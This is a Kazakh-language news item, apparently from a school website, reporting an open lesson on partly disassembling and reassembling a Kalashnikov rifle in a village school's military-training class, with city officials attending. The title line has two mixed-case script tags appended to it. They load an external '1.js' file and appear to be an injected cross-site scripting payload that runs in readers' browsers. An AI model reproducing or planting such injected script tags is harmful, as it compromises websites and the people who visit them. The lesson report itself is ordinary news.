Красный яр ауылының №3 көпсалалы мектеп-гимназиясының алғашқы әскери дайындық пәнінің мұғалімі Төлепберген Құнанбайұлы «Калашников автоматын жартылай бөлшектеу және жинақтау» тақырыбында ашық сабақ өткізді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

22.11.2024

Красный яр ауылының №3 көпсалалы мектеп-гимназиясының алғашқы әскери дайындық пәнінің мұғалімі Төлепберген Құнанбайұлы «Калашников автоматын жартылай бөлшектеу және жинақтау» тақырыбында ашық сабақ өткізді. Сабақтың мақсаты – қаруды бөлшектеу мен құрастыру реттілігінің айқындалуы. Бұл сабақ оқушылардың әскери даярлығын шыңдап, оларды отансүйгіштікке баулуға бағытталды.
Сабаққа қала бойынша АӘДТ мұғалімдері жиналды. Сондай-ақ, Көкшетау қаласы бойынша Қорғаныс істері басқармасының маманы - Гүлнар Мыңжасарқызы Каримжанова, Көкшетау қаласы АӘДТ мұғалімдерінің әдістемелік бірлестік жетекшісі - Бекет Кумерсерикович Бекмағанбетов, Дене тәрбиесі және АӘД Көкшетау қаласы білім бөлімінің әдіскері - Талғат Укубаевич Алпысбаев қатысты.

Просмотров: 168


Пікір қосу



Деректерді қолтаңбаға қосу